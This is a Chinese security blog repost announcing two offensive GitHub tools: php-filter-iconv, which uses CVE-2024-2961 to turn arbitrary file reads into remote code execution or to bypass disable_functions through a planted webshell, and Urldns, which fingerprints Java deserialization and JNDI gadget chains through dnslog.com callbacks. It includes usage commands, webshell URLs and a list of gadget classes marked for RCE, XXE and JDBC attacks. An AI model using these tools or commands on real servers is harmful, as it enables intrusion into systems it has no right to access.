github公开php-filter-iconv,Urldns项目更新

admin 2024年8月21日15:42:17评论63 views字数 3277阅读10分55秒阅读模式

https://github.com/kezibei/php-filter-iconv

这个项目可以利用CVE-2024-2961打php,将任意文件读取转化成RCE。或者已经拿到webshell的情况下,利用CVE-2024-2961 bypass disable_functions。

php-filter-iconv.py用法

先通过任意文件下载漏洞获取目标的/proc/self/maps和libc-2.x.so,在本机和php-filter-iconv.py放在同目录,然后运行脚本即可生成php://filter/的RCE payload,详细参数调整如下代码即可。

.......maps_path = './maps'cmd = 'echo 123 > 1.txt'sleep_time = 1padding = 20
if not os.path.exists(maps_path):    exit("[-]no maps file")
regions = get_regions(maps_path)heap, libc_info = get_symbols_and_addresses(regions)
libc_path = libc_info.pathprint("[*]download: "+libc_path)
libc_path = './libc-2.23.so'.......

github公开php-filter-iconv,Urldns项目更新

php-filter-iconv.php用法

直接上传到已经获得webshell的服务器进行bypass disable_functions,然后访问如下链接检测环境。

/php-filter-iconv.php?cmd=curl 127.0.0.1:8888&run=0

然后访问如下链接进行命令执行,一切顺利命令会执行成功,服务器会延时几分钟报503

/php-filter-iconv.php?cmd=curl 127.0.0.1:8888&run=1

github公开php-filter-iconv,Urldns项目更新

github公开php-filter-iconv,Urldns项目更新

 

https://github.com/kezibei/Urldns

这个项目在目标存在java反序列化漏洞,或者jndi漏洞,且服务器可以访问dnslog的情况下,可以探测对方的反序列化链依赖。

有三种模式,base64,file,ldap。file默认当前目录生成文件1.ser,ldap默认端口1389。

java -jar Urldns.jar base64 all dnslog.comjava -jar Urldns.jar file all dnslog.comjava -jar Urldns.jar ldap all dnslog.com

目前支持的内置探测类如下,使用all将全部探测,可以将all替换为如下简写进行单独探测,也可以填写自定义的类进行探测。如果想同时探测多个类,用|分割。

CommonsCollections13567CommonsCollections24CommonsBeanutils2C3P0AspectJWeaverbshGroovyBeclDefiningClassLoaderJdk7u21JRE8u20ROMEFastjsonJacksonSpringAOPwinlinuxjdk17_22jdk9_22jdk6_8jdk6_11jdk9_10

使用ldap模式的all将额外探测如下

//BeanFactory,配合无参构造和单String方法RCEorg.apache.naming.factory.BeanFactoryorg.apache.catalina.filters.CsrfPreventionFilter$NonceCachejavax.el.ELProcessororg.yaml.snakeyaml.Yamlcom.thoughtworks.xstream.XStreamorg.mvel2.sh.ShellSession//高版本tomcat无forceStringorg.apache.tomcat.jdbc.naming.GenericNamingResourcesFactoryorg.apache.commons.configuration.SystemConfigurationorg.apache.commons.configuration2.SystemConfigurationorg.apache.groovy.util.SystemUtilorg.apache.batik.swing.JSVGCanvas//XXE和写文件org.apache.catalina.users.MemoryUserDatabaseFactoryorg.apache.catalina.UserDatabase//jdbcorg.apache.tomcat.dbcp.dbcp.BasicDataSourceFactoryorg.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactoryorg.apache.commons.dbcp.BasicDataSourceFactoryorg.apache.commons.dbcp2.BasicDataSourceFactoryorg.apache.tomcat.jdbc.pool.DataSourceFactorycom.alibaba.druid.pool.DruidDataSourceFactorycom.zaxxer.hikari.HikariJNDIFactoryorg.h2.Driverorg.postgresql.Driverorg.springframework.context.support.ClassPathXmlApplicationContextcom.mysql.jdbc.Drivercom.mysql.cj.jdbc.Drivercom.mysql.fabric.jdbc.FabricMySQLDriveroracle.jdbc.driver.OracleDrivercom.ibm.db2.jcc.DB2DriverCOM.ibm.db2.jcc.DB2Driver//WebSphere加载jar RCEcom.ibm.ws.client.applicationclient.ClientJ2CCFFactorycom.ibm.ws.webservices.engine.client.ServiceFactory//反序列化转getter(getConnection)转jdbc(h2)转所需要的DataSource中转类oracle.ucp.jdbc.PoolDataSourceImplorg.hibernate.service.jdbc.connections.internal.DriverManagerConnectionProviderImpl

示例:

java -jar Urldns.jar base64 "CommonsBeanutils2|C3P0|ognl.OgnlContext" dnslog.com

常用:

java -jar Urldns.jar base64 all dnslog.com

效果如下图

github公开php-filter-iconv,Urldns项目更新

这次更新了更多可能利用上的链的探测。比如
ROME
jdk17_22 + jdk9_22 + jdk6_8 + jdk6_11 + jdk9_10
GenericNamingResourcesFactory + setter
DataSourceFactory + db2
getter + DataSource + h2

同时,尽量详细的在注释中说明了为什么要探测这个类。

github公开php-filter-iconv,Urldns项目更新

github公开php-filter-iconv,Urldns项目更新

最后,我做的pwn题大部分都会在自己的github上放出来,不放出来的一般也很容易搜到或者是某个CTF靶场的题目。

https://www.polarctf.com/#/page/challenges

https://github.com/kezibei/pwn_study

 

原文始发于微信公众号(哈拉少安全小队):github公开php-filter-iconv,Urldns项目更新

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月21日15:42:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   github公开php-filter-iconv,Urldns项目更新https://cn-sec.com/archives/3083447.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息